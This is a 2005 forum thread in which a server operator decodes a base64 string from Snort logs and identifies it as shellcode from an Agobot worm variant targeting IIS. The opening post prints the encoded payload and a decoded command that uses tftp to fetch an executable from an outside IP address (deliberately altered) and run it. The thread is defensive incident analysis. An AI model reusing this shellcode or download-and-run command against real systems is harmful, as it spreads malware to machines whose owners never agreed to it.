Clan x86
Technical (Development, Security, etc.) => General Security Information => Topic started by: iago on June 09, 2005, 06:41:12 pm
-
I was looking at my Snort logs (although this would also be seen in Apache's logs) and found this string repeated many times, more each day for the last 4 days, showing up as an attempted overflow:
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDE0Mi4xNjEuNjYuNDggR0VUIHd1YW1rb3AuZXhlJnN0YXJ0IHd1YW1rb3AuZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQiMKAwgA+A8BAPgP
This was coming from all over, and looks like an exploit. Something that doesn't belong. So I whip out my trusty base64 decoder and run it through (because a lot of it is in hex, I ran it through strings to pull out any strings):
AAAAAAAAAAAAAAAAAAAAAAAAA
ÄTòÿÿüèF
ëã.I
Âëô;T$
Ã1Àd
h<_1ö`Vë
hïÎà`h
Wÿçèîÿÿÿcmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#
What is looks like is some shellcode that runs the command:
cmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit
Which is:
Run cmd, with the command tftp (an ftp client) which gets wuamkop.exe, runs it, and ends the program. (NOTE: I added the x at the end of the IP, just to prevent potential mishaps with people running that command and getting infected :P)
A quick google on that filename turns up:
http://www.liutilities.com/products/wintaskspro/processlibrary/wuamkop/
Which says:
Process File: wuamkop or wuamkop.exe
Process Name: WORM_AGOBOT Variant
Conclusion: It's a AGOBOT worm/trojan spreading itself using a web server vulnerability. I'm not sure which server is vulnerable but, being a .exe, it's not mine (it's a Windows worm) :)
Hope that somebody found that neresting.
-
There was a post on bugtraq about this, maybe security-basics. Let me see if I can find the corresponding thread.
[EDIT]: Nevermind, it was on Incidents, and there is no online log of those threads as far as I can find. It does seem like there's a new Windows server exploit like this going around.
-
It was on "incidents". And that is a sdbot variant, this is agobot. Same exploit, though
-
Here are a couple graphs of this attack:
The number of times it hit me, by hour:
http://www.javaop.com/~iago/worm_analysis_byhour.html
The number of times it hit me, by day:
http://www.javaop.com/~iago/worm_analysis_byday.html
As you can see, it's only really been around since the 6th, and it looks like it already peaked. In another week, I'll see how it looks again.
-
Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.
-
Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.
Well, it's spreading itself along the internet. Most likely just selecting random IPs along a specified subnet, and attempting to exploit each machine, then skipping to the next.
-
Yeah, I'm assuming it's just a plain worm. It randomly either picks an ip or, like Archon said, scans a subnet.
-
What was your command-string that you used to run that through your decoder ?
-
It was pretty obvious that it was base64, and I discovered the easy way to decode that is mimencode -u. I think you can also use uuencode somehow.
-
Interesting, is this an exploit in 1.02+?
How does the virus get to the point where it can reach the servers FTP - and why would I care if I was on Linux Red Hat Apache, I can control acess can't I, how does it exploit me. It uploads an exe and runs it too (right?).
Just curious becuase I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.
-
Interesting, is this an exploit in 1.02+?
How does the virus get to the point where it can reach the servers FTP - and why would I care if I was on Linux Red Hat Apache, I can control acess can't I, how does it exploit me. It uploads an exe and runs it too (right?).
Just curious becuase I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.
You're making very little sense, but anyway, it's an IIS worm so Apache isn't affected. I don't know what you mean by "1.02", Apache is vulnerable up to "1.3.26" or so. There aren't any .exe's on Red Hat, so I wouldn't worry about that.
-
nvm issued cleared up